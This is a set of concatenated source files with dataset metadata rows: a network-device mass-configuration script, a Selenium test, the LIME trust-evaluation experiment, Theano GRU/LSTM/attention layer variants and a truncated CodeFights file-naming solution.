from Exscript import Account
hosts = euf.get_hosts_from_file('hosts_mass_config.txt')
def mass_commands(job, hosts, conn):
# conn.send("enable\r")
# conn.auto_app_authorize(accounts)
conn.execute('conf t')
mass_commands_file = 'mass_commands.txt'
with open(mass_commands_file, 'r') as f:
for line in f:
conn.execute(line)
# conn.execute('show run')
# get hostname of the device
# hostname = eum.first_match(conn, r'^hostname\s(.*)$')
# cfg_file = '/home/xxxx/python/configs/firewalls/' + hostname.strip() + '.cfg'
# config = conn.response.splitlines()
# some clean up
# for i in range(3):
# config.pop(i)
# config.pop(-0)
# config.pop(-1)
# write config to file
# with open(cfg_file, 'w') as f:
# for line in config:
# f.write(line + '\n')
# eus.start(accounts, hosts, mass_commands, max_threads = 8)
eus.quickstart(hosts, mass_commands, max_threads=8)
| unlicense | -8,519,244,133,162,871,000 | 30.974359 | 91 | 0.578188 | false |
MikeTheGreat/GLT | Tests/SeleniumTest.py | 1 | 1553 | """Testing the PyUnit / Selenium (WebDriver for Chrome) integration"""
import unittest
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
class TestSelenium(unittest.TestCase):
""""Apparently PyUnit looks for classes that inherit from TestCase """
def test_chrome(self):
"""Can I get chrome to work via WebDriver?"""
# Create a new instance of the Chrome driver
driver = webdriver.Chrome()
# go to the google home page
driver.get("http://www.google.com")
# the page is ajaxy so the title is originally this:
print driver.title
# find the element that's name attribute is q (the google search box)
input_element = driver.find_element_by_name("q")
# type in the search
input_element.send_keys("cheese!")
# submit the form (although google automatically searches now without submitting)
input_element.submit()
try:
# we have to wait for the page to refresh, the last thing that seems
# to be updated is the title
WebDriverWait(driver, 10).until(EC.title_contains("cheese!"))
# You should see "cheese! - Google Search"
print driver.title
if driver.title != "cheese! - Google Search":
self.fail()
finally:
driver.quit()
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -2,201,033,008,625,944,800 | 32.76087 | 89 | 0.637476 | false |
marcotcr/lime-experiments | data_trusting.py | 1 | 7483 | import sys
import copy
import os
import numpy as np
import scipy as sp
import json
import random
import sklearn
from sklearn import ensemble
from sklearn import svm
from sklearn import tree
from sklearn import neighbors
import pickle
import explainers
import parzen_windows
import embedding_forest
from load_datasets import *
import argparse
import collections
def get_classifier(name, vectorizer):
if name == 'logreg':
return linear_model.LogisticRegression(fit_intercept=True)
if name == 'random_forest':
return ensemble.RandomForestClassifier(n_estimators=1000, random_state=1, max_depth=5, n_jobs=10)
if name == 'svm':
return svm.SVC(probability=True, kernel='rbf', C=10,gamma=0.001)
if name == 'tree':
return tree.DecisionTreeClassifier(random_state=1)
if name == 'neighbors':
return neighbors.KNeighborsClassifier()
if name == 'embforest':
return embedding_forest.EmbeddingForest(vectorizer)
def main():
parser = argparse.ArgumentParser(description='Evaluate some explanations')
parser.add_argument('--dataset', '-d', type=str, required=True,help='dataset name')
parser.add_argument('--algorithm', '-a', type=str, required=True, help='algorithm_name')
parser.add_argument('--num_features', '-k', type=int, required=True, help='num features')
parser.add_argument('--percent_untrustworthy', '-u', type=float, required=True, help='percentage of untrustworthy features. like 0.1')
parser.add_argument('--num_rounds', '-r', type=int, required=True, help='num rounds')
args = parser.parse_args()
dataset = args.dataset
train_data, train_labels, test_data, test_labels, class_names = LoadDataset(dataset)
vectorizer = CountVectorizer(lowercase=False, binary=True)
train_vectors = vectorizer.fit_transform(train_data)
test_vectors = vectorizer.transform(test_data)
terms = np.array(list(vectorizer.vocabulary_.keys()))
indices = np.array(list(vectorizer.vocabulary_.values()))
inverse_vocabulary = terms[np.argsort(indices)]
np.random.seed(1)
classifier = get_classifier(args.algorithm, vectorizer)
classifier.fit(train_vectors, train_labels)
np.random.seed(1)
untrustworthy_rounds = []
all_features = range(train_vectors.shape[1])
num_untrustworthy = int(train_vectors.shape[1] * args.percent_untrustworthy)
for _ in range(args.num_rounds):
untrustworthy_rounds.append(np.random.choice(all_features, num_untrustworthy, replace=False))
rho = 25
kernel = lambda d: np.sqrt(np.exp(-(d**2) / rho ** 2))
LIME = explainers.GeneralizedLocalExplainer(kernel, explainers.data_labels_distances_mapping_text, num_samples=15000, return_mean=True, verbose=False, return_mapped=True)
parzen = parzen_windows.ParzenWindowClassifier()
cv_preds = sklearn.cross_validation.cross_val_predict(classifier, train_vectors, train_labels, cv=5)
parzen.fit(train_vectors, cv_preds)
sigmas = {'multi_polarity_electronics': {'neighbors': 0.75, 'svm': 10.0, 'tree': 0.5,
'logreg': 0.5, 'random_forest': 0.5, 'embforest': 0.75},
'multi_polarity_kitchen': {'neighbors': 1.0, 'svm': 6.0, 'tree': 0.75,
'logreg': 0.25, 'random_forest': 6.0, 'embforest': 1.0},
'multi_polarity_dvd': {'neighbors': 0.5, 'svm': 0.75, 'tree': 8.0, 'logreg':
0.75, 'random_forest': 0.5, 'embforest': 5.0}, 'multi_polarity_books':
{'neighbors': 0.5, 'svm': 7.0, 'tree': 2.0, 'logreg': 1.0, 'random_forest':
1.0, 'embforest': 3.0}}
parzen.sigma = sigmas[dataset][args.algorithm]
random = explainers.RandomExplainer()
exps = {}
explainer_names = ['LIME', 'random', 'greedy', 'parzen']
for expl in explainer_names:
exps[expl] = []
predictions = classifier.predict(test_vectors)
predict_probas = classifier.predict_proba(test_vectors)[:,1]
for i in range(test_vectors.shape[0]):
print i
sys.stdout.flush()
exp, mean = LIME.explain_instance(test_vectors[i], 1, classifier.predict_proba, args.num_features)
exps['LIME'].append((exp, mean))
exp = parzen.explain_instance(test_vectors[i], 1, classifier.predict_proba, args.num_features, None)
mean = parzen.predict_proba(test_vectors[i])[1]
exps['parzen'].append((exp, mean))
exp = random.explain_instance(test_vectors[i], 1, None, args.num_features, None)
exps['random'].append(exp)
exp = explainers.explain_greedy_martens(test_vectors[i], predictions[i], classifier.predict_proba, args.num_features)
exps['greedy'].append(exp)
precision = {}
recall = {}
f1 = {}
for name in explainer_names:
precision[name] = []
recall[name] = []
f1[name] = []
flipped_preds_size = []
for untrustworthy in untrustworthy_rounds:
t = test_vectors.copy()
t[:, untrustworthy] = 0
mistrust_idx = np.argwhere(classifier.predict(t) != classifier.predict(test_vectors)).flatten()
print 'Number of suspect predictions', len(mistrust_idx)
shouldnt_trust = set(mistrust_idx)
flipped_preds_size.append(len(shouldnt_trust))
mistrust = collections.defaultdict(lambda:set())
trust = collections.defaultdict(lambda: set())
trust_fn = lambda prev, curr: (prev > 0.5 and curr > 0.5) or (prev <= 0.5 and curr <= 0.5)
trust_fn_all = lambda exp, unt: len([x[0] for x in exp if x[0] in unt]) == 0
for i in range(test_vectors.shape[0]):
exp, mean = exps['LIME'][i]
prev_tot = predict_probas[i]
prev_tot2 = sum([x[1] for x in exp]) + mean
tot = prev_tot2 - sum([x[1] for x in exp if x[0] in untrustworthy])
trust['LIME'].add(i) if trust_fn(tot, prev_tot) else mistrust['LIME'].add(i)
exp, mean = exps['parzen'][i]
prev_tot = mean
tot = mean - sum([x[1] for x in exp if x[0] in untrustworthy])
trust['parzen'].add(i) if trust_fn(tot, prev_tot) else mistrust['parzen'].add(i)
exp = exps['random'][i]
trust['random'].add(i) if trust_fn_all(exp, untrustworthy) else mistrust['random'].add(i)
exp = exps['greedy'][i]
trust['greedy'].add(i) if trust_fn_all(exp, untrustworthy) else mistrust['greedy'].add(i)
for expl in explainer_names:
# switching the definition
false_positives = set(trust[expl]).intersection(shouldnt_trust)
true_positives = set(trust[expl]).difference(shouldnt_trust)
false_negatives = set(mistrust[expl]).difference(shouldnt_trust)
true_negatives = set(mistrust[expl]).intersection(shouldnt_trust)
try:
prec= len(true_positives) / float(len(true_positives) + len(false_positives))
except:
prec= 0
try:
rec= float(len(true_positives)) / (len(true_positives) + len(false_negatives))
except:
rec= 0
precision[expl].append(prec)
recall[expl].append(rec)
f1z = 2 * (prec * rec) / (prec + rec) if (prec and rec) else 0
f1[expl].append(f1z)
print 'Average number of flipped predictions:', np.mean(flipped_preds_size), '+-', np.std(flipped_preds_size)
print 'Precision:'
for expl in explainer_names:
print expl, np.mean(precision[expl]), '+-', np.std(precision[expl]), 'pvalue', sp.stats.ttest_ind(precision[expl], precision['LIME'])[1].round(4)
print
print 'Recall:'
for expl in explainer_names:
print expl, np.mean(recall[expl]), '+-', np.std(recall[expl]), 'pvalue', sp.stats.ttest_ind(recall[expl], recall['LIME'])[1].round(4)
print
print 'F1:'
for expl in explainer_names:
print expl, np.mean(f1[expl]), '+-', np.std(f1[expl]), 'pvalue', sp.stats.ttest_ind(f1[expl], f1['LIME'])[1].round(4)
if __name__ == "__main__":
main()
| bsd-2-clause | 4,007,125,213,171,677,700 | 42.254335 | 172 | 0.678338 | false |
chuckgu/Alphabeta | theano/library/Modified_Layers.py | 1 | 23038 | import theano
import theano.tensor as T
import numpy as np
from Initializations import glorot_uniform,zero,alloc_zeros_matrix,glorot_normal,numpy_floatX,orthogonal,one,uniform
import theano.typed_list
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from Activations import relu,LeakyReLU,tanh,sigmoid,linear,mean,max,softmax,hard_sigmoid
from Recurrent_Layers import Recurrent
from Layers import dropout_layer
class SGRU(Recurrent):
def __init__(self,n_in,n_hidden,n_seg=4,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.n_seg=int(n_seg)
self.input= T.tensor3()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.W_z1 = glorot_uniform((n_in,n_hidden/4))
self.b_z1 = zero((n_hidden/4,))
self.W_z2 = glorot_uniform((n_in,n_hidden/4))
self.b_z2 = zero((n_hidden/4,))
self.W_z3 = glorot_uniform((n_in,n_hidden/4))
self.b_z3 = zero((n_hidden/4,))
self.W_z4 = glorot_uniform((n_in,n_hidden/4))
self.b_z4 = zero((n_hidden/4,))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.W_r1 = glorot_uniform((n_in,n_hidden/4))
self.b_r1 = zero((n_hidden/4,))
self.W_r2 = glorot_uniform((n_in,n_hidden/4))
self.b_r2 = zero((n_hidden/4,))
self.W_r3 = glorot_uniform((n_in,n_hidden/4))
self.b_r3 = zero((n_hidden/4,))
self.W_r4 = glorot_uniform((n_in,n_hidden/4))
self.b_r4 = zero((n_hidden/4,))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.W_h1 = glorot_uniform((n_in,n_hidden/4))
self.b_h1 = zero((n_hidden/4,))
self.W_h2 = glorot_uniform((n_in,n_hidden/4))
self.b_h2 = zero((n_hidden/4,))
self.W_h3 = glorot_uniform((n_in,n_hidden/4))
self.b_h3 = zero((n_hidden/4,))
self.W_h4 = glorot_uniform((n_in,n_hidden/4))
self.b_h4 = zero((n_hidden/4,))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
]
self.L1 = 0
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h):
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z))
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r))
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h))
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def get_output(self, train=False, init_state=None):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.concatenate([T.dot(X, self.W_z1) + self.b_z1, T.dot(X, self.W_z2) + self.b_z2,T.dot(X, self.W_z3) + self.b_z3,T.dot(X, self.W_z4) + self.b_z4], axis=-1)
x_r = T.concatenate([T.dot(X, self.W_r1) + self.b_r1, T.dot(X, self.W_r2) + self.b_r2,T.dot(X, self.W_r3) + self.b_r3,T.dot(X, self.W_r4) + self.b_r4], axis=-1)
x_z = T.concatenate([T.dot(X, self.W_h1) + self.b_h1, T.dot(X, self.W_h2) + self.b_h2,T.dot(X, self.W_h3) + self.b_h3,T.dot(X, self.W_h4) + self.b_h4], axis=-1)
if init_state is None: init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h])
if self.return_seq is False:
h[-1]
return h.dimshuffle((1, 0, 2))
class Attention2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',mode='soft'):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
#self.activation=eval(activation)
self.mode=mode
self.W_h = glorot_uniform((n_in,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_v = glorot_uniform((n_hidden,n_hidden))
self.W_l = glorot_uniform((n_hidden,n_hidden))
self.W_lh = glorot_uniform((n_hidden,n_hidden))
self.W_vh = glorot_uniform((n_hidden,n_hidden))
self.U_att= orthogonal((n_hidden,1))
self.b_att= zero((1,))
self.params=[self.W_h,self.b_h,self.W_c,self.b_c,self.W_v,self.W_l,self.U_att,self.b_att,self.W_lh,self.W_vh]
self.L1 = 0
self.L2_sqr = 0
def add_input(self, add_input=None):
self.input2=add_input
def _step(self,h_tm1,p_x,p_xm,ctx):
#visual attention
#ctx=dropout_layer(ctx)
v_a=T.exp(ctx+T.dot(h_tm1,self.W_v))
v_a=v_a/v_a.sum(1, keepdims=True)
ctx_p=ctx*v_a
#linguistic attention
l_a=p_x+T.dot(h_tm1,self.W_l)[None,:,:]
l_a=T.dot(l_a,self.U_att)+self.b_att
l_a=T.exp(l_a.reshape((l_a.shape[0],l_a.shape[1])))
l_a=l_a/l_a.sum(0, keepdims=True)
l_a=l_a*p_xm
p_x_p=(p_x*l_a[:,:,None]).sum(0)
h= T.dot(ctx_p,self.W_vh) + T.dot(p_x_p,self.W_lh)
return h
def get_output(self,train=False):
if self.mode is 'soft':
X = self.get_input(train)
padded_mask = self.get_mask().astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0))
p_x = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
ctx=dropout_layer(ctx,0.25)
h, _ = theano.scan(self._step,
#sequences = [X],
outputs_info = T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1),
non_sequences=[p_x,padded_mask,ctx],
n_steps=X.shape[0] )
return h[-1]
class Attention3(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',mode='soft'):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.mode=mode
self.W_h = glorot_uniform((n_in,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_v = glorot_uniform((n_hidden,n_hidden))
self.params=[self.W_h,self.b_h,self.W_c,self.b_c,self.W_v]
self.L1 = 0
self.L2_sqr = 0
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
if self.mode is 'soft':
X=self.get_input(train)
img=T.dot(self.input2,self.W_c)+self.b_c
output=self.activation(T.dot(X,self.W_h)+self.b_h+img)
output=T.dot(output,self.W_v)
#x_mask=self.x_mask.astype('int8')
e=T.exp(output)
e=e/e.sum(1, keepdims=True)
#e=e*x_mask
output=(img*e)+X
return output
class GRU2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_hc=glorot_uniform((n_hidden,n_hidden))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c#, self.W_hc
]
self.L1 = 0
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h, ctx):
ctx=dropout_layer(ctx)
c=ctx#+T.dot(h_tm1,self.W_hc)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+c)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+c)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+c)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self, train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
#init_state=ctx
h, _ = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h, ctx])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
class GRU3(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_hc=glorot_uniform((n_hidden,n_hidden))
self.W_hl=glorot_uniform((n_hidden,n_hidden))
self.W_cl=glorot_uniform((n_hidden,n_hidden))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c, self.W_hc,
self.W_hl,self.W_cl
]
self.L1 = 0
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,l_tm1,
u_z, u_r, u_h, ctx):
c=ctx+T.dot(h_tm1,self.W_hc)
c=tanh(c)
c=T.exp(c)
c=c/c.sum(-1, keepdims=True)
c=ctx*c
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+c)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+c)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+c)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1+c
logit=tanh(T.dot(h_t, self.W_hl)+T.dot(c, self.W_cl))
return h_t,logit
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self, train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
ctx=dropout_layer(self.input2,0.25)
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(ctx, self.W_c) + self.b_c
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
[h,logit], _ = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=[init_state,init_state],
non_sequences=[self.U_z, self.U_r, self.U_h,ctx])
if self.return_seq is False: return logit[-1]
return logit.dimshuffle((1, 0, 2))
class LSTM2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_i = glorot_uniform((n_in,n_hidden))
self.U_i = orthogonal((n_hidden,n_hidden))
self.b_i = zero((n_hidden,))
self.W_f = glorot_uniform((n_in,n_hidden))
self.U_f = orthogonal((n_hidden,n_hidden))
self.b_f = one((n_hidden,))
self.W_c = glorot_uniform((n_in,n_hidden))
self.U_c = orthogonal((n_hidden,n_hidden))
self.b_c = zero((n_hidden,))
self.W_o = glorot_uniform((n_in,n_hidden))
self.U_o = orthogonal((n_hidden,n_hidden))
self.b_o = zero((n_hidden,))
self.params = [
self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o,
]
self.L1 = 0
self.L2_sqr = 0
def _step(self,
xi_t, xf_t, xo_t, xc_t, mask_tm1,
h_tm1, c_tm1,
u_i, u_f, u_o, u_c):
i_t = hard_sigmoid(xi_t + T.dot(h_tm1, u_i))
f_t = hard_sigmoid(xf_t + T.dot(h_tm1, u_f))
c_t = f_t * c_tm1 + i_t * self.activation(xc_t + T.dot(h_tm1, u_c))
c_t = mask_tm1 * c_t + (1. - mask_tm1) * c_tm1
o_t = hard_sigmoid(xo_t + T.dot(h_tm1, u_o))
h_t = o_t * self.activation(c_t)
h_t = mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t, c_t
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
xi = T.dot(X, self.W_i) + self.b_i
xf = T.dot(X, self.W_f) + self.b_f
xc = T.dot(X, self.W_c) + self.b_c
xo = T.dot(X, self.W_o) + self.b_o
init_state=self.input2
[h, c], _ = theano.scan(self._step,
sequences=[xi, xf, xo, xc, padded_mask],
outputs_info=[
init_state,
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
],
non_sequences=[self.U_i, self.U_f, self.U_o, self.U_c])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
class BiDirectionGRU2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',output_mode='concat',return_seq=True):
self.n_in=int(n_in)
if output_mode is 'concat':n_hidden=int(n_hidden/2)
self.n_hidden=int(n_hidden)
self.output_mode = output_mode
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
# forward weights
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
# backward weights
self.Wb_z = glorot_uniform((n_in,n_hidden))
self.Ub_z = glorot_uniform((n_hidden,n_hidden))
self.bb_z = zero((n_hidden,))
self.Wb_r = glorot_uniform((n_in,n_hidden))
self.Ub_r = glorot_uniform((n_hidden,n_hidden))
self.bb_r = zero((n_hidden,))
self.Wb_h = glorot_uniform((n_in,n_hidden))
self.Ub_h = glorot_uniform((n_hidden,n_hidden))
self.bb_h = zero((n_hidden,))
self.Wb_c = glorot_uniform((4096,n_hidden))
self.bb_c = zero((n_hidden,))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c,
self.Wb_z, self.Ub_z, self.bb_z,
self.Wb_r, self.Ub_r, self.bb_r,
self.Wb_h, self.Ub_h, self.bb_h,
self.Wb_c, self.bb_c
]
self.L1 = T.sum(abs(self.W_z))+T.sum(abs(self.U_z))+\
T.sum(abs(self.W_r))+T.sum(abs(self.U_r))+\
T.sum(abs(self.W_h))+T.sum(abs(self.U_h))+\
T.sum(abs(self.Wb_z))+T.sum(abs(self.Ub_z))+\
T.sum(abs(self.Wb_r))+T.sum(abs(self.Ub_r))+\
T.sum(abs(self.Wb_h))+T.sum(abs(self.Ub_h))
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)+\
T.sum(self.Wb_z**2) + T.sum(self.Ub_z**2)+\
T.sum(self.Wb_r**2) + T.sum(self.Ub_r**2)+\
T.sum(self.Wb_h**2) + T.sum(self.Ub_h**2)
def _fstep(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h,
ctx):
ctx=dropout_layer(ctx)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+ctx)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+ctx)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+ctx)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def _bstep(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h,
ctx):
ctx=dropout_layer(ctx)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+ctx)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+ctx)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+ctx)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def get_forward_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
#init_state=self.input2
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._fstep,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h,ctx])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
def get_backward_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.Wb_z) + self.bb_z
x_r = T.dot(X, self.Wb_r) + self.bb_r
x_h = T.dot(X, self.Wb_h) + self.bb_h
ctx = T.dot(self.input2, self.Wb_c) + self.bb_c
#init_state=self.input2
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._bstep,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.Ub_z, self.Ub_r, self.Ub_h, ctx],go_backwards = True)
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
forward = self.get_forward_output(train)
backward = self.get_backward_output(train)
if self.output_mode is 'sum':
return forward + backward
elif self.output_mode is 'concat':
if self.return_seq: axis=2
else: axis=1
return T.concatenate([forward, backward], axis=axis)
else:
raise Exception('output mode is not sum or concat') | gpl-3.0 | 7,263,858,907,643,852,000 | 33.645113 | 168 | 0.489496 | false |
HKuz/Test_Code | CodeFights/fileNaming.py | 1 | 1488 | #!/usr/local/bin/python
# Code Fights File Naming Problem
def fileNaming(names):
valid = []
tmp = dict()
for name in names:
if name not in tmp:
valid.append(name)
tmp[name] = True
else:
# That file name has been used
k = 1
new = name
while new in tmp:
new = name + '(' + str(k) + ')'
k += 1
valid.append(new)
tmp[new] = True
return valid
def main():
tests = [
[
["doc", "doc", "image", "doc(1)", "doc"],
["doc", "doc(1)", "image", "doc(1)(1)", "doc(2)"]
],
[
["a(1)", "a(6)", "a", "a", "a", "a", "a", "a", "a", "a", "a", "a"],
